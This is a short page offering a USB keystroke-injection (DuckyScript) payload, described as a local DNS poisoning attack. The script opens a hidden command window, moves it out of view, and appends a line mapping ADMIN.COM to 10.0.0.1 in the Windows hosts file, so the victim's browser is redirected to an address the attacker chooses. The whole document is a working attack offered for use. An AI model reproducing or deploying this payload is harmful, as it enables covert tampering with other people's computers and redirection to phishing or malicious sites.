25 lines
582 B
Plaintext
25 lines
582 B
Plaintext
The following is a local DNS poisoning attack that changes a hosts 'host' file. The host will then be redirected to the website of your choice (IP Address), every time the user types in the given domain name in their browser.
|
|
|
|
```
|
|
REM Author:ashbreeze96 and overwraith
|
|
GUI r
|
|
STRING cmd /Q /D /T:7F /F:OFF /V:ON /K
|
|
DELAY 500
|
|
ENTER
|
|
DELAY 750
|
|
ALT SPACE
|
|
STRING M
|
|
DOWNARROW
|
|
REPEAT 100
|
|
ENTER
|
|
DELAY 50
|
|
STRING ECHO. >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
|
|
DELAY 50
|
|
ENTER
|
|
DELAY 50
|
|
STRING ECHO 10.0.0.1 ADMIN.COM >> C:\WINDOWS\SYSTEM32\DRIVERS\ETC\HOSTS
|
|
DELAY 50
|
|
ENTER
|
|
STRING exit
|
|
ENTER
|
|
``` |